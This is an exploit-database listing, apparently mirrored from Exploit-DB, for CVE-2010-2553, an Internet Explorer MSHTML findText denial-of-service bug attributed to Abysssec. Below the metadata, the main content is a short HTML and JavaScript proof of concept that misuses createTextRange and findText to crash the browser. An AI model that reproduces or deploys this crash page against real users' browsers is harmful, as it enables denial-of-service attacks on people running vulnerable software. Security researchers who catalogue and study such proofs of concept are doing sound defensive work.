[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft Internet Explorer - MSHTML Findtext Processing

Author: Abysssec
type: dos
platform: windows
port: 
date_added: 2010-09-27 
date_updated: 2010-09-27 
verified: 1 
codes: CVE-2010-2553 
tags: 
aliases:  
screenshot_url:  
application_url: 
<html>
<body>
<input type="button" value="Crachme!" onclick="Search()"/>
<input  type="text" value="Abysssec" id="Abysssec">&lt;/textarea&gt;

<script type="text/javascript">
function Search(){
var textinput  = document.getElementById("Abysssec");

var textRange = textinput.createTextRange();
textRange.findText(unescape("%u4141"),-1);
textRange.select(document.getElementById('d'));
document.body.appendChild(textinput);
}
</script>
<p id="p">Abysssec</p>
http://www.exploit-db.com/moaub-27-microsoft-internet-explorer-mshtml-findtext-processing-issue/
</body>
</html>
</p>
</body>
</html>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.